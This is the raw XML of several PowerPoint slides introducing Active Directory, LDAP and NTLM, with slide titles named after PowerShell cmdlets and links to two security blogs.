                <a:hlinkClick r:id="rId6" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>http://blog.harmj0y.net/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>https://enigma0x3.net/</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232323"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Get-ADDomain"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Get-ADDomain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="183" name="letmeexplainAD.jpg" descr="letmeexplainAD.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2273300" y="2526266"/>
            <a:ext cx="8458200" cy="6350001"/>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Windows Based Directory service…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Windows Based Directory service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Allows for centralized management of authentication/authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Allows for easy deployment of role-based access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Access granted based on NTLM/Kerberos tickets (windows devices) or LDAP/RADIUS (non-windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Often used as SSO solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Get-help"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Get-help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87">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8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8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87">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87">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187">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87" grpId="1"/>
    </p:bld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Lightweight Directory Access Protocol…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Lightweight Directory Access Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>How you ‘Speak to’ AD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>X.500 Standard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Client/Server </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Find-ldapobject"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Find-ldapobject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2">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9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9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9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92">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92" grpId="1"/>
    </p:bld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NTLM…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>NTLM </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Windows NT LAN Manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t> replaced with Kerberos starting Windows 2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Still basically Used everywhere </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Get-credential"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Get-credential</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7">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9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9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97">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97">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97" grpId="1"/>
    </p:bldLst>
  </p:timing>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Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Get-credential"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="467359">
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Get-credential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="204" name="page24image34100720.png" descr="page24image34100720.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="86934" y="2958310"/>
            <a:ext cx="12822616" cy="6395240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Text"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2292350" y="1543049"/>
            <a:ext cx="190500"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457200">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> </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New_Template7">
  <a:themeElements>
    <a:clrScheme name="New_Template7">
      <a:dk1>
        <a:srgbClr val="222222"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="838787"/>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80000"/>
          </a:lnSpc>
          <a:spcBef>
            <a:spcPts val="0"/>
          </a:spcBef>
          <a:spcAft>
            <a:spcPts val="0"/>
          </a:spcAft>
          <a:buClrTx/>
          <a:buSzTx/>
          <a:buFontTx/>
          <a:buNone/>
          <a:tabLst/>
          <a:defRPr b="0" baseline="0" cap="all" i="0" spc="0" strike="noStrike" sz="2800" u="none" kumimoji="0" normalizeH="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7">
  <a:themeElements>
    <a:clrScheme name="New_Template7">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>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80000"/>
          </a:lnSpc>
          <a:spcBef>
            <a:spcPts val="0"/>
          </a:spcBef>
          <a:spcAft>
            <a:spcPts val="0"/>
          </a:spcAft>
          <a:buClrTx/>
          <a:buSzTx/>
          <a:buFontTx/>
          <a:buNone/>
          <a:tabLst/>
          <a:defRPr b="0" baseline="0" cap="all" i="0" spc="0" strike="noStrike" sz="2800" u="none" kumimoji="0" normalizeH="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